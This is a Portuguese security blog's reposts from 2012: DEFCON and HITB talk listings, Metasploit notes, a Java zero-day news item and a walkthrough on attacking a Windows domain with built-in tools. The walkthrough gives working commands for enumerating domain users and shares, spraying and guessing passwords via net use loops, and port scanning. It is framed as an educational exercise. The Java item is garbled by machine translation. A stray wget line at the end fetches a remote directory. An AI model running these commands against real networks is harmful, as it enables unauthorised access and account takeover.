terça-feira, setembro 11, 2012

domingo, setembro 09, 2012

DEFCON 16: Nmap: Scanning the Internet

Speaker: Fyodor, Hacker, Insecure.Org

The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project. He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided.

For more information visit: http://bit.ly/defcon16_information
To download the video visit: http://bit.ly/defcon16_videos

Não preciso comentar muito não é? 

Exploiting the Windows Domain

A common recommendation I often come across is that Internet-facing systems should not be a part of an active Windows domain. As an exercise of interest, I have decided to look at this topic a little deeper and explore what advantage (if any) access to a domain member really provides.

In this scenario I will demonstrate how to gain privilege within a Windows domain using only the tools available on a default Windows install. I will be working under the assumption that:
  1. I have access to a public terminal (or something similar) with up-to-date anti-virus.
  2. I do not have administrative access on the host.
  3. I do not have access to any third-party tools.
Once connected to a Windows workstation, the first piece of information I want to find is the domain namespace. This can be done a couple of different ways:
nbtstat –A <IP-Address>

net config workstation

Next, because I am working from a domain member, I can query the domain controller and check whether it’s aware of any additional domains:
net view /domain

*Note: It is often advantageous to target other domains such as those used for testing and development. These environments will often contain hosts where less emphasis is placed on security.

Next I am interested in knowing what hosts exist on the domain. For this, I can query the domain controller:
net view /domain:<DOM> > hosts.txt

Depending on the size of the network this listing can get quite large. I have redirected the output into a text file to prevent continually query the domain controller.

*Note: This command will not typically respond with every Windows host on the network. Only hosts available via NETBIOS are known to the domain controller.

Because I’m on a Windows domain, I can be fairly certain some machines will have file sharing turned on.  Large networks are often host to a myriad of file shares with “interesting” data on them. It’s not uncommon to find personally identifiable information or even login credentials sitting on workstation or server shares.

To obtain a list of systems with active shares I can query each domain member by using:
for /f %i in (hosts.txt) do @(net view \\%i >> shares.txt 2>nul)

This command will loop over the file containing the domain members (obtained from the previous command) and query each host for open shares. Any errors (i.e. inaccessible systems) are discarded.

As previously mentioned, in some cases you may get lucky and find exactly what you’re looking for within these shares. For the sake of this exercise, however, let’s assume there was nothing interesting found.

Next I am interested in what users and groups exist on the domain. The goal here is to elevate my privileges on the domain (remember, I only have ‘User’ rights on one system thus far). To obtain a list of domain users and groups I can query the domain controller as follows:
net user /domain > users.txt 
net group /domain > groups.txt

Once this information is gathered I want to look for “interesting” user accounts. Usernames containing the words “temp”, “test”, “tst”, “tmp”, "helpdesk", "ftp" are all of interest here as testing and temporary accounts often have simple passwords.
type users.txt | find “test”

If there are no stand-out usernames in the list above I can direct my efforts on querying the groups:
 type groups.txt | find “helpdesk”

The domain controller can then be queried to dump the users belonging to that group:
net group “helpdesk” /domain

*NOTE: I have chosen to target non-administrative accounts here as they typically have weaker passwords. However, it is certainly not unheard of to have weak passwords on account belonging to “Domain Admins”. Always worth checking :)

Having chosen a number of domain users to target I can now attempt to compromise these accounts through password guessing. I can accomplish this through SMB connection attempts against a host on the domain. Which host I choose here doesn’t matter as authentication occurs against the domain controller and not the host itself.
for /f %i in (users.txt) do @(for /f %j in (passwords.txt) do @(echo Trying %i:%j... >> success.txt && net use \\wombat /u:%i %j 1>>success.txt && net use \\wombat /del))

This script will loop over a list of targeted usernames (in users.txt) and try simple password attempts against each account from the passwords.txt file. Success.txtwill keep a log of successful password guesses. Keep in mind here I am only targeting the low hanging fruit. Only a few passwords are being attempted for each account as to not lock out any accounts.

With a small adaptation this script I can choose to target every account in the entire domain:
for /f %i in (users.txt) do @( echo Trying %i:%j... >> success.txt && net use \\wombat /u:%i %i 1>>success.txt && net use \\wombat /del)

Here I am scanning the entire domain for accounts that use their username as their password. This is sometimes known as a horizontal password scan.

The benefits of horizontal scanning become apparent in environments with a large user base. An increase in the number of accounts often improves the chances of discovering an account with a weak password. The chance of locking out an account is also significantly decreased as only a small number of password guesses are attempted against each account.

The above script could also be tweaked to guess the password of the default local administrative account (RID 500) on the current machine. Providing this account is active, it cannot be locked out (meaning infinite password guesses).

Once credentials have been acquired for a domain account the next step is to find out what access the account has. Indeed, it may be the case that only a particular service on a particular host is accessible from the captured account.

The next step in this process is to find out what services are available on the domain. This would be quite simple with nmap... but remember, we don’t have access to any third-party tools! To get around this I have adapted Ed Skoudis’ FTP command line port scanner:
for /f %i in (hosts.txt) do @(for /f %j in (ports.txt) do @(echo Checking %i:%j... & echo %i:%j >> success.txt & echo open %i %j > commands.txt & echo quit >> commands.txt & ftp -n -s:commands.txt 1>>success.txt))

This script attempts to make a connection to each port in ports.txt (I've chose 21\ftp) for every domain member in hosts.txt (found at the beginning of this exercise). It uses the built-in Windows FTP client to read in commands (-s flag) from commands.txt to make each connection. Logging information is stored insuccess.txt.

Once the available network services have been mapped I can then attempt to exploit / gain access to these services:

In this post I have demonstrated several examples of how domain membership can be abused to gain privilege on a Windows' domain. Due to the inherent verbose nature of Windows’ domains, attackers have the advantage of gaining valuable information about a target network in a relatively short period of time. That said, however, a skilled attacker always has (and always will) be able to penetrate a network’s defences regardless of having domain membership or not.
Fonte: Defence in Depth

Into to Metasploit - Jeremy Druin

Into to Metasploit - Jeremy Druin
    This is the 5th in a line of classes Jeremy Druin will be giving on pen-testing and web app security featuring Mutillidae for the Kentuckiana ISSA. This one covers Metasploit.

Notes:Vulnerability Exploitation
 Metasploit Exploit Framework
  a. Framework
   i. Exploits
    • Sorted by OS and/or Software
   ii. Payloads
    • Singles
     o Communications and function entangled
    • Stagers
     o Load stage and handle communications
    • Stages (note: Inplement shell, upexec, vncinject, meterpreter, etc.)
     o meterpreter
     o shell
     o vnc
     o mssql_payload
     o psexec
   iii. Post Exploit Modules
   iv. Auxillary Modules
   v. Interfaces
    1. msfconsole
     1. search <type>:<value> <string>
     2. help
     3. use
     4. show <what to show>
      i. payloads
      ii. exploits
      iii. post
      iv. auxillary
      v. <more>
    2. Metasploit Community Edition

Download from:

Fonte: irongeek 

The Guide to Backtrack - Hakin9 on Demand

The Guide to Backtrack - Hakin9 on Demand

BackTrack - highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.Guide to BackTrack 5 provides you over 100 pages of practical articles on using the distro.
    For PenTest new subscribers we offer Guide to BackTrack 5 as an add-on. Subscribe to PenTest now and mail us aten@pentestmag.com with "Guide to BackTrack 5" in the title to get the e-book.

Windows Server 2012

Boa Noite! Vamos testa? O.o rs... 
Microsoft has released Windows Server 2012, which expands the definition of a server operating system, with new advancements in virtualization, storage, networking and automation.
Microsoft Windows Server 2012
Well there are hundreds of new features can help customers achieve a transformational leap in the speed, scale and power of their datacenters and applications. In combination with Windows Azure and System Center, Windows Server 2012 empowers customers to manage and deliver applications and services across private, hosted and public clouds.

System requirment for Microsoft Windows Server 2012
  • Processor performance depends not only on the clock frequency of the processor, but also on the number of processor cores and the size of the processor cache. The following are the processor requirements for this product:
    Minimum: 1.4 GHz 64-bit processor
  • The following are the estimated RAM requirements for this product:
    Minimum: 512 MB
  • The following are the estimated minimum disk space requirements for the system partition.
    Minimum: 32 GB
However it is said that for sucessful installation 32 GB is not enough.
Ther are many changes in 2012 which we have srted studing. Evaluation copy is avilable so what are you waiting for. [ Click here ] to read more and download a copy of Microsoft Windows Server 2012.
Fonte: pentestit.com (: 


Grave vulnerabilidade não corrigida Java está a ser explorada por atacantes

Ele descobriu uma vulnerabilidade no Java para os quais não existe remendo , que está a ser explorada por atacantes, e cujo código é público. 's o pior cenário possível .

Ainda não se sabe muito sobre a vulnerabilidade, uma vez que não teve tempo para fazer um estudo exaustivo, mas foram relatados por agora coloca-nos o pior cenário possível .

FireEye descobriu um servidor com um frasco. Que explorava uma vulnerabilidade. Então, alguém sabe e está usando a falha. Através de um domínio de terceiro nível dinâmico (aa24.net) e servidor de web-mail de uma empresa chinesa (que provavelmente foi atacado), é (ainda) a distribuição de malware, graças a esta decisão em Java.

Através de um índice na " reunião "do servidor, de modo ofuscado Javascript, o malware está sendo distribuídoé esta:


O problema afeta a versão mais recente do Java em seu ramo 7, até sua "Update 6 ". Não afeta o ramo 6, que ainda está de pé, mas está em período de " extinção ". Ele funciona em todos os principais navegadores  e EMET mesmo ativo.

Embora os pesquisadores que descobriram que não oferecem detalhes, um terceiro lançou uma prova de conceito para explorar a falha, o que abriu a porta para qualquer um poderia explorar . O código é simples, limpo, funcional e confiável. Compilar e lançar. Logo depois, ele foi apresentado como um módulo em Metasploit. Essa licença para qualquer atacante pode começar a distribuir seus malwares própria (provavelmente durante os próximos dias, você pode ver na Blackhole mania exploit kit entre os atacantes).Se, como já dissemos mais de uma vez, a máquina virtual Java vantagem não atual é que a maioria dos criadores de malware para distribuir suas amostras, esta vulnerabilidade permite que " o mercado aberto "também entre atual.

Extrato do código. Jar

Na ausência de um adesivo eficaz, não há nenhuma maneira simples para aliviar o problema . A melhor prática é desativar o Java no navegador. Ninguém sabe quando a Oracle vai resolver o problema. O seu ciclo de atualização trimestral, sugere que até 16 de outubro não pode parcheen o problema muito sério. Desde então, a Oracle não costuma emitir patches fora do ciclo. Raramente tem feito com sua base de dados, seu principal produto. Mas certamente não com Java desde que ele pertence.

Em abril de 2010 Tavis Ormandy e Ruben Santamarta descobriu uma falha de segurança grave no JRE. A Ormandy da Oracle disse que não foi considerada grave o suficiente para publicar qualquer coisa antes do prazo fixado. Uma semana depois, eles lançaram um patch fora do ciclo (Java 6 Update 20), que não estabelecer a correção da vulnerabilidade. Eles tiveram que provar que não parava falha ocorrer, mas não houve confirmação oficial.

Algumas semanas atrás, escreveu em um-a-dia, um título que (obviamente nos levando certas licenças) afirmou: "Se você não atualizar o Java, estão infectados ". Com a intenção de chamar a atenção para o fato de que uma grande parte dos agressores foram aproveitando muito recentes falhas enormes em Java e que a maneira mais eficaz de defender foi atualizado. Estamos vivendo dia a dia no laboratório. Agora podemos acrescentar que,mesmo se ele é atualizado com medidas extras de segurança, como o EMET, há um risco de um invasor executar código no sistema .

Mais informações:

Zero-Day Temporada ainda não acabou

Java 7 informações sobre vulnerabilidades 0-day e mitigação.

Java Deployment Toolkit realiza a validação insuficiente de Parâmetros

[0 dias] Java Web Start injeção de linha de comando arbitrário - "-XXaltjvm" dll carga arbitrária

Dom About Face: Fora do Ciclo de patches críticos falha Java Update

Fonte: Sergio de los Santos [ Homepage ]

HitbSecConf 2012

[   ]CLOSING KEYNOTE - Ms Jaya Baloo - Identity Privacy and Security.pdf25-May-2012 19:371.9M 
[   ]D1 SIGINT - Marinus Kuivenhoven - Hack to the Future.pdf24-May-2012 16:441.2M 
[   ]D1 SIGINT - Ralf- Philip Weinmann - NO SLIDES.pdf24-May-2012 13:340 
[   ]D1 SIGINT - Xavier Mertens - Pastebinmon and Leakedin.pdf24-May-2012 13:30308K 
[   ]D1T1 - Arnauld Mascret - Whistling Over The Wire.zip24-May-2012 14:5441M 
[   ]D1T1 - Claudio Guarnieri - One Flew Over the Cuckoos Nest.pdf24-May-2012 12:274.5M 
[   ]D1T1 - Ivo Pooters - Turning Android Inside Out.pdf24-May-2012 11:356.4M 
[   ]D1T1 - Juan-Pablo Echtegoyen - Attacking the SAP Solution Manager.pdf24-May-2012 15:422.5M 
[   ]D1T1 - Roberto Suggi and Scott Bell - Browser Bug Hunting in 2012.pdf24-May-2012 17:463.3M 
[   ]D1T2 - Adam Gowdiak - Security Threats in Digital Sat Televisions.pdf24-May-2012 15:421.9M 
[   ]D1T2 - Adam Gowdiak - Security Vulnerabilities of DVB Chipsets.pdf24-May-2012 17:432.4M 
[   ]D1T2 - Itzhak Zuk Avraham and Nir Goldshlager - Killing a Bug Bounty Program - Twice.pdf24-May-2012 12:315.5M 
[   ]D1T2 - MuscleNerd - Evolution of iPhone Baseband and Unlocks.pdf24-May-2012 14:40229K 
[   ]D1T2 - Sebastien Renaud and Kevin Szkudlapski - WinRT.pdf24-May-2012 11:231.4M 
[   ]D1T3 - Didier Stevens - Whitehat Shellcode.zip24-May-2012 13:29100M 
[   ]D1T3 - Gal Diskin - Hacking Using Dynamic Binary Instrumentation.pdf24-May-2012 15:432.9M 
[   ]D1T3 - Jurriaan Bremer - Binary Obfuscation the SSE Way.pdf24-May-2012 16:441.5M 
[   ]D2 SIGINT - Elger Jonker - Close-Up of Three Technical Hackerspace Projects.pdf25-May-2012 15:2910M 
[   ]D2 SIGINT - Rory Breuk and Albert Spruyt - Integrating DMA Attacks in Metasploit.pdf25-May-2012 15:282.8M 
[   ]D2T1 - Alex Bazhanyuk and Nikita Tarakanov - Automatically Searching for Vulnerabilities.pdf25-May-2012 12:321.1M 
[   ]D2T1 - Andrei Costin - Postscript Dangers Ahead - Hacking MFPCs.pdf25-May-2012 11:411.5M 
[   ]D2T1 - Georgia Weidman - Bypassing the Android Permission Model.pdf25-May-2012 15:231.4M 
[   ]D2T1 - Kenneth White - A Deep Analysis of Amazon Web Services.pdf25-May-2012 15:593.7M 
[   ]D2T1 - Marco Balduzzi - SatanCloud.pdf25-May-2012 17:061.5M 
[   ]D2T2 - Jailbreak Dream Team - Absinthe Jailbreak for iOS 5.0.1.pdf25-May-2012 14:314.9M 
[   ]D2T2 - Jailbreak Dream Team - Corona Jailbreak for iOS 5.0.1.pdf25-May-2012 12:307.8M 
[   ]D2T2 - Nicolas Gregoire - Attacking XML Processing.pdf25-May-2012 16:3411M 
[   ]D2T2 - Rahul Sasi - CXML VXML Auditing for IVR Pentesters.zip25-May-2012 11:3963M 
[   ]D2T2 - Steven Seeley - Ghost In the Windows 7 Allocator.pdf25-May-2012 17:061.3M 
[   ]D2T3 - Chema Alonso and Manu The Sur - Power of FOCA 3.pdf25-May-2012 13:4018M 
[   ]D2T3 - Enno Rey Daniel Mende Pascal Turbing Matthias Luft - Smashing VMDK Files for Fun and Profit.pdf25-May-2012 17:066.1M 
[   ]D2T3 - Mario Vuksan and Tomislav Pericin - Titan Engine 3.pdf25-May-2012 15:59435K 
[   ]KEYNOTE 1 - Andy Ellis - Staying Ahead of the Security Poverty Line.pdf24-May-2012 10:005.9M 
[   ]KEYNOTE 2 - Bruce Schneier - Trust, Security and Society - NO SLIDES.pdf25-May-2012 10:340

Fonte: brasil-underground@googlegroups.com // Fabiano Matias.
wget -Fr http://1xpixel.com.ar/666/